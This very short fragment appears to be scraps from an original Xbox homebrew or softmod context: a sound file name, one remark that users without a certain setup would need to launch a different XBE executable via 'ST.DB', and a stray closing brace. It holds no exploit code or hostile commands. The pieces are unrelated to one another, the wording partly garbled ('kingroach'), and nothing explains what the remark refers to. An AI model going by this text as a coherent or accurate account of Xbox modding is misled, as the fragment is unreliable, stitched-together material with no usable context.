AMB_EC_Steam7.wav
Non kingroach Ndure users would need to launch a different XBE via the ST.DB though...
&}